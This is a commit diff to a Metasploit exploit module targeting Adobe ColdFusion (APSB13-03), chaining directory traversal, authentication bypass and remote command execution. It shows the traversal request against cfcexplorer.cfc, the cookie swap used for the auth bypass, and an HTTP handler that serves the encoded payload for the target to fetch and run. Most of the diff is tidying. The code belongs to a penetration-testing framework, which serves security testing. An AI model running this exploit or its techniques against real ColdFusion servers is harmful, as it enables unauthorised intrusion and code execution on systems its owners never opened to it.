Adding most suggested changes to jhart's adobe module

2013-04-09 17:55:28 -05:00 · 2013-04-09 17:55:28 -05:00 · 90e986860e
parent 522642a65d
commit 90e986860e
1 changed files with 22 additions and 18 deletions
--- a/modules/exploits/multi/http/adobe_coldfusion_apsb13_03.rb
+++ b/modules/exploits/multi/http/adobe_coldfusion_apsb13_03.rb
@ -19,23 +19,18 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'        => 'Adobe ColdFusion APSB13-03',
 			'Description' => %q{
 				This module exploits a pile of vulnerabilities in Adobe ColdFusion APSB13-03:
-					* CVE-2013-0625: arbitrary command execution in scheduleedit.cfm (9.x only)
-					* CVE-2013-0629: directory traversal
-					* CVE-2013-0632: authentication bypass
+				CVE-2013-0625 (arbitrary command execution in scheduleedit.cfm (9.x only)),
+				CVE-2013-0629 (directory traversal), and CVE-2013-0632 (authentication bypass)
 			},
 			'Author'       =>
 				[
-					'Jon Hart <jon_hart[at]rapid7.com', # Metasploit module
+					'Jon Hart <jon_hart[at]rapid7.com>', # Metasploit module
 				],
 			'License'     => MSF_LICENSE,
 			'References'  =>
 				[
 					[ 'CVE', '2013-0625'],
 					[ 'CVE', '2013-0629'],
-					# we don't actually exploit this, as this is the backdoor
-					# dropped by malware exploiting the other vulnerabilities
-					[ 'CVE', '2013-0631'],
-					[ 'CVE', '2013-0632'],
 				],
 			'Targets'        =>
 				[
@ -50,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DefaultTarget'  => 1,
 			'Privileged'  => true,
-			'Platform'    => [ 'win', 'linux' ],
+			'Platform'    => [ 'win', 'linux', 'unix' ],
 			'DisclosureDate' => 'Jan 15 2013'))

 		register_options(
@ -103,7 +98,13 @@ class Metasploit3 < Msf::Exploit::Remote

 		# if we managed to login, get the listener ready
 		datastore['URIPATH'] = rand_text_alphanumeric(6)
-		srv_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}"
+		if (datastore['SRVHOST'] == "0.0.0.0")
+			srv_host = Rex::Socket.source_address(rhost)
+		else
+			srv_host = datastore['SRVHOST']
+		end
+		srv_port = datastore['SRVPORT'] || 80
+		srv_uri = "http://#{srv_host}:#{srv_port}"
 		start_service

 		# drop a payload on disk which we can used to execute
@ -154,7 +155,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end

 	def on_request_uri cli, request
-		cf_payload = "test"
 		case request.uri
 		when "/#{datastore['URIPATH']}-e"
 			cf_payload = <<-EOF
@ -165,6 +165,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			EOF
 		when "/#{datastore['URIPATH']}-p"
 			cf_payload = payload.encoded
+		else
+			cf_payload = "test"
 		end
 		send_response(cli, cf_payload, { 'Content-Type' => 'text/html' })
 	end
@ -216,9 +218,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				'connection' => 'TE, close',
 				'cookie' => build_cookie_header(cookie_hash),
 			})
-		cookie_hash.merge! get_useful_cookies res

 		if res
+			cookie_hash.merge! get_useful_cookies res
 			# XXX: I can only seem to get this to work if 'Enable Session Variables'
 			# is disabled (Server Settings -> Memory Variables)
 			token = res.body.scan(/<input type="hidden" name="csrftoken" value="([^\"]+)"/).flatten.first
@ -541,7 +543,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# was just wide open
 		vuln_without_creds = false
 		paths.each do |path|
-			if (traverse_read path, nil) =~ /ADOBE SYSTEMS INCORPORATED/
+			if traverse_read(path, nil) =~ /ADOBE SYSTEMS INCORPORATED/
 				vulns += 1
 				vuln_without_creds = true
 				break
@ -559,7 +561,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			vuln_without_bypass = false
 			paths.each do |path|
 				cf_cookies = componentutils_login datastore['USERNAME'], datastore['PASSWORD']
-				if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
+				if traverse_read(path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
 					vulns += 1
 					vuln_without_bypass = true
 					break
@ -581,7 +583,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			# and use it for CFAUTHORIZATION_componentutils
 			cf_cookies['CFAUTHORIZATION_componentutils'] = cf_cookies['CFAUTHORIZATION_cfadmin']
 			cf_cookies.delete 'CFAUTHORIZATION_cfadmin'
-			if (traverse_read path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
+			if traverse_read(path, cf_cookies) =~ /ADOBE SYSTEMS INCORPORATED/
 				vulns += 1
 				vuln_with_bypass = true
 				break
@ -604,7 +606,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			# the vulnerability for CVE-2013-0632 is that if RDS is disabled during install but
 			# subsequently *enabled* after install, the password is unset so we simply must
 			# check that and only that.
-			cf_cookies = adminapi_login 'foo', 'bar', true
+			cf_cookies = adminapi_login Rex::Text.rand_text_alpha(4), Rex::Text.rand_text_alpha(4), true
 			if cf_cookies.empty?
 				print_status "#{datastore['RHOST']} is not vulnerable to CVE-2013-0632"
 			else
@ -617,7 +619,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		false
 	end

-	def traverse_read path, cookies
+	def traverse_read(path, cookies)
 		uri = normalize_uri(target_uri.path)
 		uri << "CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=CFIDE.adminapi.administrator&path="
 		uri << path
@ -628,6 +630,8 @@ class Metasploit3 < Msf::Exploit::Remote
 				'connection' => 'TE, close',
 				'cookie' => build_cookie_header(cookies)
 			})
-		res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '')
+		if res and res.body
+			res.body.gsub(/\r\n?/, "\n").gsub(/.<html>.<head>.<title>Component.*/m, '')
+		end
 	end
 end